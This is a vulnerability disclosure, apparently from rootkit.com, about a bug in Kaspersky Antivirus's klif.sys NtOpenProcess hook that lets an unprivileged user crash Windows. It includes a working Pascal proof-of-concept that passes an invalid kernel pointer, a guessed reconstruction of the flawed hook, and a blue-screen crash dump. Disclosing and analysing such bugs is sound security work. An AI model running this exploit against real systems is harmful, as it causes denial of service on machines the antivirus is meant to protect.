The reasons why we decided to post this material on rootkit.com is simple:
Well-known and really good Kaspersky Antivirus very long time suffers from very dangerous bug, which can be used as exploit and crash system protected by this antivirus down even from Guest account.
All attempts to inform Kaspersky Lab about this vulnerability was ignored. This material was posted some years ago, and in the last summer we posted new exploit for Kaspersky AV 6.0 which was based on previously discovered by Ms-Rem security hole. And nothing was changed. Even now with upcoming Kaspersky Antivirus 7.0 this exploit works very well.
The main goal of this exploit is calling NtOpenProcess with invalid parameters. This function is hooked by Kaspersky driver called klif.sys and reasons of its interception is obvious - this was made to protect Kaspersky AV from unauthorized access and closing by malware.
Here is prototype of this function
NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL );
Here is a small exploit coded in pascal (worked well with klif.sys version 6.12.10.280 and previous versions)
var
ob1: OBJECT_ATTRIBUTES;
p1: DWORD;
begin
ob1.Length := sizeof(ob1);
NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;
As you see last parameter is CLIENT_ID structure - address and its points to invalid random memory region in kernel.
After starting this exploit on clean Windows XP, without KAV - no BSOD appears.
After starting this exploit on Windows XP protected by KAV 7.0 - we are getting immediately BSOD - PAGE_FAULT_IN_NONPAGED_AREA
Why this happened? Very simple explanation. The source of Hook on NtOpenProcess, I guess, looks like this:
NTSTATUS NewNtOpenProcess (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
__try
{
if (ClientId->UniqueProcess == KasperskyProcesss) return STATUS_ACCESS_DENIED;
The biggest mistake here is ClientId->UniqueProcess, since ClientId is a POINTER to structure. Accessing to invalid memory region causes immediately PAGE_FAULT_IN_NONPAGED_AREA.
originally exploit was created by Ms-Rem and looks like
NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);
Now as you see KAV developers have used try/except block, but as shows they don't know about MmIsAddressValid.
Hope now developers of Kaspersky Antivirus will discover for themself wonderful program called - NtCall and fix this bug.
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 83000000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.
***** Kernel symbols are WRONG. Please fix symbols to do analysis.
MODULE_NAME: klif
FAULTING_MODULE: 804d7000 nt
DEBUG_FLR_IMAGE_TIMESTAMP: 46260f1c
READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
83000000